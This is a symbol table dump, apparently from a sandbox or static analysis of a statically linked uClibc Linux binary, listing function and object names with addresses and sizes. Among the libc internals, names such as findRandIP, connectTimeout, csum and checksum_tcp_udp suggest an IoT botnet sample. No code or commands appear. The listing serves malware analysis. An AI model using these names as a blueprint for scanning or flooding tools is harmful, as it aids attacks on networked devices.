            __GI___libc_fcntl.symtab0x4076e8100FUNC<unknown>HIDDEN2
            __GI___sigaddset.symtab0x4096f428FUNC<unknown>HIDDEN2
            __GI___sigdelset.symtab0x40971030FUNC<unknown>HIDDEN2
            __GI___sigismember.symtab0x4096d432FUNC<unknown>HIDDEN2
            __GI___uClibc_fini.symtab0x40b3ec70FUNC<unknown>HIDDEN2
            __GI___uClibc_init.symtab0x40b46758FUNC<unknown>HIDDEN2
            __GI___xpg_strerror_r.symtab0x4092d4196FUNC<unknown>HIDDEN2
            __GI__exit.symtab0x40784443FUNC<unknown>HIDDEN2
            __GI_abort.symtab0x40a8a0200FUNC<unknown>HIDDEN2
            __GI_atoi.symtab0x40ad4418FUNC<unknown>HIDDEN2
            __GI_brk.symtab0x40dd8843FUNC<unknown>HIDDEN2
            __GI_clock_getres.symtab0x40b81441FUNC<unknown>HIDDEN2
            __GI_close.symtab0x4078a041FUNC<unknown>HIDDEN2
            __GI_closedir.symtab0x40b948147FUNC<unknown>HIDDEN2
            __GI_config_close.symtab0x40bede43FUNC<unknown>HIDDEN2
            __GI_config_open.symtab0x40bf0946FUNC<unknown>HIDDEN2
            __GI_config_read.symtab0x40bc1c706FUNC<unknown>HIDDEN2
            __GI_connect.symtab0x4094b043FUNC<unknown>HIDDEN2
            __GI_dup2.symtab0x4074dc44FUNC<unknown>HIDDEN2
            __GI_errno.symtab0x51f4284OBJECT<unknown>HIDDEN10
            __GI_execl.symtab0x40b278287FUNC<unknown>HIDDEN2
            __GI_execve.symtab0x40b7d038FUNC<unknown>HIDDEN2
            __GI_exit.symtab0x40aeb892FUNC<unknown>HIDDEN2
            __GI_fclose.symtab0x40c008269FUNC<unknown>HIDDEN2
            __GI_fcntl.symtab0x4076e8100FUNC<unknown>HIDDEN2
            __GI_fflush_unlocked.symtab0x40cecc322FUNC<unknown>HIDDEN2
            __GI_fgetc.symtab0x40cd00128FUNC<unknown>HIDDEN2
            __GI_fgetc_unlocked.symtab0x40d010222FUNC<unknown>HIDDEN2
            __GI_fgets.symtab0x40cd80116FUNC<unknown>HIDDEN2
            __GI_fgets_unlocked.symtab0x40d0f0116FUNC<unknown>HIDDEN2
            __GI_fopen.symtab0x40c11810FUNC<unknown>HIDDEN2
            __GI_fork.symtab0x4075e838FUNC<unknown>HIDDEN2
            __GI_fputs_unlocked.symtab0x408a1856FUNC<unknown>HIDDEN2
            __GI_fseek.symtab0x40e12c5FUNC<unknown>HIDDEN2
            __GI_fseeko64.symtab0x40e134225FUNC<unknown>HIDDEN2
            __GI_fstat.symtab0x40ddb482FUNC<unknown>HIDDEN2
            __GI_fstat64.symtab0x40ddb482FUNC<unknown>HIDDEN2
            __GI_fwrite_unlocked.symtab0x408a50128FUNC<unknown>HIDDEN2
            __GI_getc_unlocked.symtab0x40d010222FUNC<unknown>HIDDEN2
            __GI_getdtablesize.symtab0x40769836FUNC<unknown>HIDDEN2
            __GI_getegid.symtab0x40b8688FUNC<unknown>HIDDEN2
            __GI_geteuid.symtab0x4075e08FUNC<unknown>HIDDEN2
            __GI_getgid.symtab0x40b8bc8FUNC<unknown>HIDDEN2
            __GI_gethostbyname.symtab0x40946010FUNC<unknown>HIDDEN2
            __GI_gethostbyname2.symtab0x40946c65FUNC<unknown>HIDDEN2
            __GI_gethostbyname2_r.symtab0x40da60761FUNC<unknown>HIDDEN2
            __GI_gethostbyname_r.symtab0x40f67c791FUNC<unknown>HIDDEN2
            __GI_gethostname.symtab0x40f9c094FUNC<unknown>HIDDEN2
            __GI_getpagesize.symtab0x40b7f819FUNC<unknown>HIDDEN2
            __GI_getpid.symtab0x4075a48FUNC<unknown>HIDDEN2
            __GI_getrlimit.symtab0x40b84040FUNC<unknown>HIDDEN2
            __GI_getsockname.symtab0x4094dc41FUNC<unknown>HIDDEN2
            __GI_getuid.symtab0x40b80c8FUNC<unknown>HIDDEN2
            __GI_h_errno.symtab0x51f42c4OBJECT<unknown>HIDDEN10
            __GI_htonl.symtab0x40942c5FUNC<unknown>HIDDEN2
            __GI_htons.symtab0x4094248FUNC<unknown>HIDDEN2
            __GI_inet_addr.symtab0x40944029FUNC<unknown>HIDDEN2
            __GI_inet_aton.symtab0x40d9d8135FUNC<unknown>HIDDEN2
            __GI_inet_ntop.symtab0x40e771518FUNC<unknown>HIDDEN2
            __GI_inet_pton.symtab0x40e491493FUNC<unknown>HIDDEN2
            __GI_initstate_r.symtab0x40ac88185FUNC<unknown>HIDDEN2
            __GI_ioctl.symtab0x4077dc101FUNC<unknown>HIDDEN2
            __GI_isatty.symtab0x40939825FUNC<unknown>HIDDEN2
            __GI_kill.symtab0x4076bc44FUNC<unknown>HIDDEN2
            __GI_lseek.symtab0x40fe9845FUNC<unknown>HIDDEN2
            __GI_lseek64.symtab0x40fa705FUNC<unknown>HIDDEN2
            __GI_memchr.symtab0x40d2dc236FUNC<unknown>HIDDEN2
            __GI_memcpy.symtab0x408f50102FUNC<unknown>HIDDEN2
            __GI_memmove.symtab0x40d3c8702FUNC<unknown>HIDDEN2
            __GI_mempcpy.symtab0x40d28090FUNC<unknown>HIDDEN2
            __GI_memrchr.symtab0x40d7a8233FUNC<unknown>HIDDEN2
            __GI_memset.symtab0x408ad0210FUNC<unknown>HIDDEN2
            __GI_mmap.symtab0x40b6f448FUNC<unknown>HIDDEN2
            __GI_mremap.symtab0x40b91442FUNC<unknown>HIDDEN2
            __GI_munmap.symtab0x40b8c438FUNC<unknown>HIDDEN2
            __GI_nanosleep.symtab0x40b8ec38FUNC<unknown>HIDDEN2
            __GI_ntohl.symtab0x4094395FUNC<unknown>HIDDEN2
            __GI_ntohs.symtab0x4094318FUNC<unknown>HIDDEN2
            __GI_open.symtab0x407510106FUNC<unknown>HIDDEN2
            __GI_opendir.symtab0x40ba71157FUNC<unknown>HIDDEN2
            __GI_pipe.symtab0x40757c38FUNC<unknown>HIDDEN2
            __GI_poll.symtab0x40f99441FUNC<unknown>HIDDEN2
            __GI_raise.symtab0x40dd5c18FUNC<unknown>HIDDEN2
            __GI_random.symtab0x40a97472FUNC<unknown>HIDDEN2
            __GI_random_r.symtab0x40ab7790FUNC<unknown>HIDDEN2
            __GI_rawmemchr.symtab0x40d6e8189FUNC<unknown>HIDDEN2
            __GI_read.symtab0x40767039FUNC<unknown>HIDDEN2
            __GI_readdir64.symtab0x40bb84143FUNC<unknown>HIDDEN2
            __GI_recv.symtab0x40953c11FUNC<unknown>HIDDEN2
            __GI_recvfrom.symtab0x40954845FUNC<unknown>HIDDEN2
            __GI_sbrk.symtab0x40b87074FUNC<unknown>HIDDEN2
            __GI_select.symtab0x40764444FUNC<unknown>HIDDEN2
            __GI_send.symtab0x40957811FUNC<unknown>HIDDEN2
            __GI_sendto.symtab0x40958448FUNC<unknown>HIDDEN2
            __GI_setsockopt.symtab0x4095b453FUNC<unknown>HIDDEN2
            __GI_setstate_r.symtab0x40aacc171FUNC<unknown>HIDDEN2
            __GI_sigaction.symtab0x40b72d114FUNC<unknown>HIDDEN2
            __GI_sigaddset.symtab0x40961c35FUNC<unknown>HIDDEN2
            __GI_sigemptyset.symtab0x40964010FUNC<unknown>HIDDEN2
            __GI_signal.symtab0x40964c133FUNC<unknown>HIDDEN2
            __GI_sigprocmask.symtab0x40787047FUNC<unknown>HIDDEN2
            __GI_sleep.symtab0x40af14142FUNC<unknown>HIDDEN2
            __GI_socket.symtab0x4095ec47FUNC<unknown>HIDDEN2
            __GI_sprintf.symtab0x407924149FUNC<unknown>HIDDEN2
            __GI_srandom_r.symtab0x40abd1183FUNC<unknown>HIDDEN2
            __GI_stat.symtab0x40fa2079FUNC<unknown>HIDDEN2
            __GI_stat64.symtab0x40fa2079FUNC<unknown>HIDDEN2
            __GI_strcasecmp.symtab0x40fec848FUNC<unknown>HIDDEN2
            __GI_strchr.symtab0x408bb0417FUNC<unknown>HIDDEN2
            __GI_strchrnul.symtab0x40d8cc268FUNC<unknown>HIDDEN2
            __GI_strcmp.symtab0x408e4433FUNC<unknown>HIDDEN2
            __GI_strcoll.symtab0x408e4433FUNC<unknown>HIDDEN2
            __GI_strcpy.symtab0x408e70213FUNC<unknown>HIDDEN2
            __GI_strcspn.symtab0x40d168135FUNC<unknown>HIDDEN2
            __GI_strdup.symtab0x40fa7854FUNC<unknown>HIDDEN2
            __GI_strlen.symtab0x408d60225FUNC<unknown>HIDDEN2
            __GI_strncpy.symtab0x409224131FUNC<unknown>HIDDEN2
            __GI_strnlen.symtab0x409158201FUNC<unknown>HIDDEN2
            __GI_strpbrk.symtab0x40e380140FUNC<unknown>HIDDEN2
            __GI_strrchr.symtab0x40d89453FUNC<unknown>HIDDEN2
            __GI_strspn.symtab0x40d1f0135FUNC<unknown>HIDDEN2
            __GI_strstr.symtab0x409094193FUNC<unknown>HIDDEN2
            __GI_strtok.symtab0x4092c810FUNC<unknown>HIDDEN2
            __GI_strtok_r.symtab0x40d68894FUNC<unknown>HIDDEN2
            __GI_strtol.symtab0x40ad5810FUNC<unknown>HIDDEN2
            __GI_strtoll.symtab0x40ad5810FUNC<unknown>HIDDEN2
            __GI_sysconf.symtab0x40b083499FUNC<unknown>HIDDEN2
            __GI_tcgetattr.symtab0x4093b4110FUNC<unknown>HIDDEN2
            __GI_time.symtab0x4075ac8FUNC<unknown>HIDDEN2
            __GI_times.symtab0x40b9408FUNC<unknown>HIDDEN2
            __GI_toupper.symtab0x4078cc30FUNC<unknown>HIDDEN2
            __GI_uname.symtab0x40fe7038FUNC<unknown>HIDDEN2
            __GI_vfork.symtab0x4074c421FUNC<unknown>HIDDEN2
            __GI_vsnprintf.symtab0x4079bc189FUNC<unknown>HIDDEN2
            __GI_wait4.symtab0x40b7a047FUNC<unknown>HIDDEN2
            __GI_waitpid.symtab0x4076107FUNC<unknown>HIDDEN2
            __GI_wcrtomb.symtab0x40bf3868FUNC<unknown>HIDDEN2
            __GI_wcsnrtombs.symtab0x40bf8c123FUNC<unknown>HIDDEN2
            __GI_wcsrtombs.symtab0x40bf7c15FUNC<unknown>HIDDEN2
            __GI_write.symtab0x4077b042FUNC<unknown>HIDDEN2
            __JCR_END__.symtab0x518bc00OBJECT<unknown>DEFAULT8
            __JCR_LIST__.symtab0x518bc00OBJECT<unknown>DEFAULT8
            __app_fini.symtab0x51f4188OBJECT<unknown>HIDDEN10
            __atexit_lock.symtab0x5190e040OBJECT<unknown>DEFAULT9
            __bss_start.symtab0x5191380NOTYPE<unknown>DEFAULTSHN_ABS
            __check_one_fd.symtab0x40b43253FUNC<unknown>DEFAULT2
            __close_nameservers.symtab0x40f5dc109FUNC<unknown>HIDDEN2
            __ctype_b.symtab0x518d608OBJECT<unknown>DEFAULT9
            __ctype_tolower.symtab0x5191308OBJECT<unknown>DEFAULT9
            __ctype_toupper.symtab0x518d708OBJECT<unknown>DEFAULT9
            __curbrk.symtab0x51f4308OBJECT<unknown>HIDDEN10
            __data_start.symtab0x518bf00NOTYPE<unknown>DEFAULT9
            __decode_dotted.symtab0x40e978280FUNC<unknown>HIDDEN2
            __decode_header.symtab0x40fb74156FUNC<unknown>HIDDEN2
            __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
            __dns_lookup.symtab0x40ea901836FUNC<unknown>HIDDEN2
            __do_global_ctors_aux.symtab0x40ffa00FUNC<unknown>DEFAULT2
            __do_global_dtors_aux.symtab0x4001000FUNC<unknown>DEFAULT2
            __dso_handle.symtab0x518be00OBJECT<unknown>HIDDEN9
            __encode_dotted.symtab0x40fef8162FUNC<unknown>HIDDEN2
            __encode_header.symtab0x40fab0193FUNC<unknown>HIDDEN2
            __encode_question.symtab0x40fc1080FUNC<unknown>HIDDEN2
            __environ.symtab0x51f4088OBJECT<unknown>DEFAULT10
            __errno_location.symtab0x4078ec6FUNC<unknown>DEFAULT2
            __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            __exit_cleanup.symtab0x51f3f88OBJECT<unknown>HIDDEN10
            __fcntl_nocancel.symtab0x40774c100FUNC<unknown>DEFAULT2
            __fgetc_unlocked.symtab0x40d010222FUNC<unknown>DEFAULT2
            __fini_array_end.symtab0x518b9c0NOTYPE<unknown>HIDDENSHN_ABS
            __fini_array_start.symtab0x518b9c0NOTYPE<unknown>HIDDENSHN_ABS
            __get_hosts_byname_r.symtab0x40f64c48FUNC<unknown>HIDDEN2
            __getdents.symtab0x40e00c288FUNC<unknown>HIDDEN2
            __getdents64.symtab0x40e00c288FUNC<unknown>HIDDEN2
            __getpagesize.symtab0x40b7f819FUNC<unknown>DEFAULT2
            __glibc_strerror_r.symtab0x4092a814FUNC<unknown>DEFAULT2
            __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            __h_errno_location.symtab0x40bc146FUNC<unknown>DEFAULT2
            __h_errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            __init_array_end.symtab0x518b9c0NOTYPE<unknown>HIDDENSHN_ABS
            __init_array_start.symtab0x518b9c0NOTYPE<unknown>HIDDENSHN_ABS
            __libc_close.symtab0x4078a041FUNC<unknown>DEFAULT2
            __libc_connect.symtab0x4094b043FUNC<unknown>DEFAULT2
            __libc_fcntl.symtab0x4076e8100FUNC<unknown>DEFAULT2
            __libc_fork.symtab0x4075e838FUNC<unknown>DEFAULT2
            __libc_lseek.symtab0x40fe9845FUNC<unknown>DEFAULT2
            __libc_lseek64.symtab0x40fa705FUNC<unknown>DEFAULT2
            __libc_nanosleep.symtab0x40b8ec38FUNC<unknown>DEFAULT2
            __libc_open.symtab0x407510106FUNC<unknown>DEFAULT2
            __libc_read.symtab0x40767039FUNC<unknown>DEFAULT2
            __libc_recv.symtab0x40953c11FUNC<unknown>DEFAULT2
            __libc_recvfrom.symtab0x40954845FUNC<unknown>DEFAULT2
            __libc_select.symtab0x40764444FUNC<unknown>DEFAULT2
            __libc_send.symtab0x40957811FUNC<unknown>DEFAULT2
            __libc_sendto.symtab0x40958448FUNC<unknown>DEFAULT2
            __libc_sigaction.symtab0x40b72d114FUNC<unknown>DEFAULT2
            __libc_stack_end.symtab0x51f4008OBJECT<unknown>DEFAULT10
            __libc_waitpid.symtab0x4076107FUNC<unknown>DEFAULT2
            __libc_write.symtab0x4077b042FUNC<unknown>DEFAULT2
            __local_nameserver.symtab0x414ed016OBJECT<unknown>HIDDEN4
            __malloc_consolidate.symtab0x40a52a407FUNC<unknown>HIDDEN2
            __malloc_largebin_index.symtab0x409730110FUNC<unknown>DEFAULT2
            __malloc_lock.symtab0x518fa040OBJECT<unknown>DEFAULT9
            __malloc_state.symtab0x51f7301752OBJECT<unknown>DEFAULT10
            __malloc_trim.symtab0x40a494150FUNC<unknown>DEFAULT2
            __nameserver.symtab0x51fe288OBJECT<unknown>HIDDEN10
            __nameservers.symtab0x51fe304OBJECT<unknown>HIDDEN10
            __open_etc_hosts.symtab0x40fc6010FUNC<unknown>HIDDEN2
            __open_nameservers.symtab0x40f211968FUNC<unknown>HIDDEN2
            __pagesize.symtab0x51f4108OBJECT<unknown>DEFAULT10
            __preinit_array_end.symtab0x518b9c0NOTYPE<unknown>HIDDENSHN_ABS
            __preinit_array_start.symtab0x518b9c0NOTYPE<unknown>HIDDENSHN_ABS
            __progname.symtab0x5191108OBJECT<unknown>DEFAULT9
            __progname_full.symtab0x5191188OBJECT<unknown>DEFAULT9
            __pthread_initialize_minimal.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
            __pthread_mutex_init.symtab0x40b3cf3FUNC<unknown>DEFAULT2
            __pthread_mutex_lock.symtab0x40b3cc3FUNC<unknown>DEFAULT2
            __pthread_mutex_trylock.symtab0x40b3cc3FUNC<unknown>DEFAULT2
            __pthread_mutex_unlock.symtab0x40b3cc3FUNC<unknown>DEFAULT2
            __pthread_return_0.symtab0x40b3cc3FUNC<unknown>DEFAULT2
            __read_etc_hosts_r.symtab0x40fc6a518FUNC<unknown>HIDDEN2
            __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
            __res_sync.symtab0x51fe188OBJECT<unknown>HIDDEN10
            __resolv_attempts.symtab0x5191251OBJECT<unknown>HIDDEN9
            __resolv_lock.symtab0x51f44040OBJECT<unknown>DEFAULT10
            __resolv_timeout.symtab0x5191241OBJECT<unknown>HIDDEN9
            __restore_rt.symtab0x40b7240NOTYPE<unknown>DEFAULT2
            __rtld_fini.symtab0x51f4208OBJECT<unknown>HIDDEN10
            __searchdomain.symtab0x51fe208OBJECT<unknown>HIDDEN10
            __searchdomains.symtab0x51fe344OBJECT<unknown>HIDDEN10
            __sigaddset.symtab0x4096f428FUNC<unknown>DEFAULT2
            __sigdelset.symtab0x40971030FUNC<unknown>DEFAULT2
            __sigismember.symtab0x4096d432FUNC<unknown>DEFAULT2
            __stdin.symtab0x518d988OBJECT<unknown>DEFAULT9
            __stdio_READ.symtab0x40e21858FUNC<unknown>HIDDEN2
            __stdio_WRITE.symtab0x40c124150FUNC<unknown>HIDDEN2
            __stdio_adjust_position.symtab0x40e254131FUNC<unknown>HIDDEN2
            __stdio_fwrite.symtab0x40c3f0259FUNC<unknown>HIDDEN2
            __stdio_init_mutex.symtab0x407adb15FUNC<unknown>HIDDEN2
            __stdio_mutex_initializer.4911.symtab0x41387040OBJECT<unknown>DEFAULT4
            __stdio_rfill.symtab0x40e2d837FUNC<unknown>HIDDEN2
            __stdio_seek.symtab0x40e35c31FUNC<unknown>HIDDEN2
            __stdio_trans2r_o.symtab0x40e30090FUNC<unknown>HIDDEN2
            __stdio_trans2w_o.symtab0x40c4f4149FUNC<unknown>HIDDEN2
            __stdio_wcommit.symtab0x407b7439FUNC<unknown>HIDDEN2
            __stdout.symtab0x518da08OBJECT<unknown>DEFAULT9
            __syscall_error.symtab0x40b6dc22FUNC<unknown>HIDDEN2
            __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            __uClibc_fini.symtab0x40b3ec70FUNC<unknown>DEFAULT2
            __uClibc_init.symtab0x40b46758FUNC<unknown>DEFAULT2
            __uClibc_main.symtab0x40b4a1570FUNC<unknown>DEFAULT2
            __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            __uclibc_progname.symtab0x5191088OBJECT<unknown>HIDDEN9
            __vfork.symtab0x4074c421FUNC<unknown>HIDDEN2
            __xpg_strerror_r.symtab0x4092d4196FUNC<unknown>DEFAULT2
            __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            __xstat32_conv.symtab0x40deb4172FUNC<unknown>HIDDEN2
            __xstat64_conv.symtab0x40de08172FUNC<unknown>HIDDEN2
            __xstat_conv.symtab0x40df60172FUNC<unknown>HIDDEN2
            _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _bss_custom_printf_spec.symtab0x51f1f010OBJECT<unknown>DEFAULT10
            _charpad.symtab0x407b9c77FUNC<unknown>DEFAULT2
            _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _custom_printf_arginfo.symtab0x51f68080OBJECT<unknown>HIDDEN10
            _custom_printf_handler.symtab0x51f6d080OBJECT<unknown>HIDDEN10
            _custom_printf_spec.symtab0x518f908OBJECT<unknown>HIDDEN9
            _dl_aux_init.symtab0x40dd7023FUNC<unknown>DEFAULT2
            _dl_phdr.symtab0x51fe088OBJECT<unknown>DEFAULT10
            _dl_phnum.symtab0x51fe108OBJECT<unknown>DEFAULT10
            _edata.symtab0x5191380NOTYPE<unknown>DEFAULTSHN_ABS
            _end.symtab0x51fe380NOTYPE<unknown>DEFAULTSHN_ABS
            _errno.symtab0x51f4284OBJECT<unknown>DEFAULT10
            _exit.symtab0x40784443FUNC<unknown>DEFAULT2
            _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _fini.symtab0x40ffd40FUNC<unknown>DEFAULT3
            _fixed_buffers.symtab0x51d1f08192OBJECT<unknown>DEFAULT10
            _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _fp_out_narrow.symtab0x407be9120FUNC<unknown>DEFAULT2
            _fpmaxtostr.symtab0x40c6e01565FUNC<unknown>HIDDEN2
            _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _h_errno.symtab0x51f42c4OBJECT<unknown>DEFAULT10
            _init.symtab0x4000e80FUNC<unknown>DEFAULT1
            _load_inttype.symtab0x40c58c85FUNC<unknown>HIDDEN2
            _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _ppfs_init.symtab0x408318114FUNC<unknown>HIDDEN2
            _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _ppfs_parsespec.symtab0x4085b21126FUNC<unknown>HIDDEN2
            _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _ppfs_prepargs.symtab0x40838c67FUNC<unknown>HIDDEN2
            _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _ppfs_setargs.symtab0x4083d0436FUNC<unknown>HIDDEN2
            _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _promoted_size.symtab0x40858446FUNC<unknown>DEFAULT2
            _pthread_cleanup_pop_restore.symtab0x40b3da18FUNC<unknown>DEFAULT2
            _pthread_cleanup_push_defer.symtab0x40b3d28FUNC<unknown>DEFAULT2
            _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _sigintr.symtab0x51f7208OBJECT<unknown>HIDDEN10
            _start.symtab0x40019442FUNC<unknown>DEFAULT2
            _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _stdio_fopen.symtab0x40c1bc563FUNC<unknown>HIDDEN2
            _stdio_init.symtab0x407a7c95FUNC<unknown>HIDDEN2
            _stdio_openlist.symtab0x518da88OBJECT<unknown>DEFAULT9
            _stdio_openlist_add_lock.symtab0x518db040OBJECT<unknown>DEFAULT9
            _stdio_openlist_dec_use.symtab0x40cdf4216FUNC<unknown>HIDDEN2
            _stdio_openlist_del_count.symtab0x51d1e44OBJECT<unknown>DEFAULT10
            _stdio_openlist_del_lock.symtab0x518de040OBJECT<unknown>DEFAULT9
            _stdio_openlist_use_count.symtab0x51d1e04OBJECT<unknown>DEFAULT10
            _stdio_streams.symtab0x518e10384OBJECT<unknown>DEFAULT9
            _stdio_term.symtab0x407aea135FUNC<unknown>HIDDEN2
            _stdio_user_locking.symtab0x518e084OBJECT<unknown>DEFAULT9
            _stdlib_strto_l.symtab0x40ad64339FUNC<unknown>HIDDEN2
            _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _store_inttype.symtab0x40c5e446FUNC<unknown>HIDDEN2
            _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _string_syserrmsgs.symtab0x4139702906OBJECT<unknown>HIDDEN4
            _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _uintmaxtostr.symtab0x40c614201FUNC<unknown>HIDDEN2
            _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _vfprintf_internal.symtab0x407c611716FUNC<unknown>HIDDEN2
            _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            abort.symtab0x40a8a0200FUNC<unknown>DEFAULT2
            abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            access.symtab0x40761841FUNC<unknown>DEFAULT2
            access.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            acnc.symtab0x40346e161FUNC<unknown>DEFAULT2
            add_entry.symtab0x406abb99FUNC<unknown>DEFAULT2
            atoi.symtab0x40ad4418FUNC<unknown>DEFAULT2
            atoi.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            bcopy.symtab0x4092b814FUNC<unknown>DEFAULT2
            bcopy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            been_there_done_that.symtab0x51f3f04OBJECT<unknown>DEFAULT10
            brk.symtab0x40dd8843FUNC<unknown>DEFAULT2
            brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            bsd_signal.symtab0x40964c133FUNC<unknown>DEFAULT2
            buf.5765.symtab0x51f210448OBJECT<unknown>DEFAULT10
            bzero.symtab0x408fc0210FUNC<unknown>DEFAULT2
            c.symtab0x518d484OBJECT<unknown>DEFAULT9
            calloc.symtab0x40a02c248FUNC<unknown>DEFAULT2
            calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            checksum.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            checksum_generic.symtab0x4001c0114FUNC<unknown>DEFAULT2
            checksum_tcp_udp.symtab0x400232222FUNC<unknown>DEFAULT2
            checksum_tcpudp.symtab0x400310222FUNC<unknown>DEFAULT2
            clock.symtab0x4078f446FUNC<unknown>DEFAULT2
            clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            clock_getres.symtab0x40b81441FUNC<unknown>DEFAULT2
            clock_getres.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            close.symtab0x4078a041FUNC<unknown>DEFAULT2
            close.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            closedir.symtab0x40b948147FUNC<unknown>DEFAULT2
            closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            closenameservers.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            completed.5150.symtab0x5191401OBJECT<unknown>DEFAULT10
            connect.symtab0x4094b043FUNC<unknown>DEFAULT2
            connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            connectTimeout.symtab0x4019ce582FUNC<unknown>DEFAULT2
            crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            csum.symtab0x401d16116FUNC<unknown>DEFAULT2
            data_start.symtab0x518bf00NOTYPE<unknown>DEFAULT9
            decoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            decodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            dnslookup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            dup2.symtab0x4074dc44FUNC<unknown>DEFAULT2
            dup2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            encoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            encodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            encodeq.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            environ.symtab0x51f4088OBJECT<unknown>DEFAULT10
            errno.symtab0x51f4284OBJECT<unknown>DEFAULT10
            errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            execl.symtab0x40b278287FUNC<unknown>DEFAULT2
            execl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            execve.symtab0x40b7d038FUNC<unknown>DEFAULT2
            execve.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            exit.symtab0x40aeb892FUNC<unknown>DEFAULT2
            exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            exp10_table.symtab0x414d30208OBJECT<unknown>DEFAULT4
            fclose.symtab0x40c008269FUNC<unknown>DEFAULT2
            fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fcntl.symtab0x4076e8100FUNC<unknown>DEFAULT2
            fd_to_DIR.symtab0x40b9dc149FUNC<unknown>DEFAULT2
            fdgets.symtab0x4014a3130FUNC<unknown>DEFAULT2
            fdopen_pids.symtab0x51d1c08OBJECT<unknown>DEFAULT10
            fdopendir.symtab0x40bb0e115FUNC<unknown>DEFAULT2
            fdpclose.symtab0x40137b296FUNC<unknown>DEFAULT2
            fdpopen.symtab0x4011a2473FUNC<unknown>DEFAULT2
            fflush_unlocked.symtab0x40cecc322FUNC<unknown>DEFAULT2
            fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fgetc.symtab0x40cd00128FUNC<unknown>DEFAULT2
            fgetc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fgetc_unlocked.symtab0x40d010222FUNC<unknown>DEFAULT2
            fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fgets.symtab0x40cd80116FUNC<unknown>DEFAULT2
            fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fgets_unlocked.symtab0x40d0f0116FUNC<unknown>DEFAULT2
            fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            findRandIP.symtab0x401ce747FUNC<unknown>DEFAULT2
            fmt.symtab0x414d1020OBJECT<unknown>DEFAULT4
            fopen.symtab0x40c11810FUNC<unknown>DEFAULT2
            fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fork.symtab0x4075e838FUNC<unknown>DEFAULT2
            fork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fputs_unlocked.symtab0x408a1856FUNC<unknown>DEFAULT2
            fputs_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            frame_dummy.symtab0x4001500FUNC<unknown>DEFAULT2
            free.symtab0x40a6c1451FUNC<unknown>DEFAULT2
            free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fseek.symtab0x40e12c5FUNC<unknown>DEFAULT2
            fseeko.symtab0x40e12c5FUNC<unknown>DEFAULT2
